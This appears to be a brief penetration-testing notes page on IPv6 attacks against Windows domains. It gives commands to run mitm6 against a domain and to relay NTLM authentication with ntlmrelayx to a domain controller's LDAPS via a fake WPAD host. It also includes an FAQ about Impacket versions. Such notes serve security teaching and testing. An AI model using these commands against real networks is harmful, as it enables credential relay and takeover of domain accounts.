IPv6 Attacks

MITM6

git clone https://github.com/fox-it/mitm6.git

pip2 install .

mitm6 -d domain.local

in KALI: temp enable IPv6

sysctl -w net.ipv6.conf.all.disable_ipv6=0 sysctl -w net.ipv6.conf.default.disable_ipv6=0

ntlmrelayx.py -6 -t ldaps://<ip_of_DC> -wh fakewpad.domain.local -l lootme

Combining NTLM Relays and Kerberos Delegation:

Frequently Asked Questions:

Question: My ntlmrelayx is giving an error during the attack. How can I resolve?

Resolution: Impacket versions > 0.9.19 are unstable and causing issues for students and pentesters alike. Try purging impacket completely and downloading 0.10.0 from here:

Last updated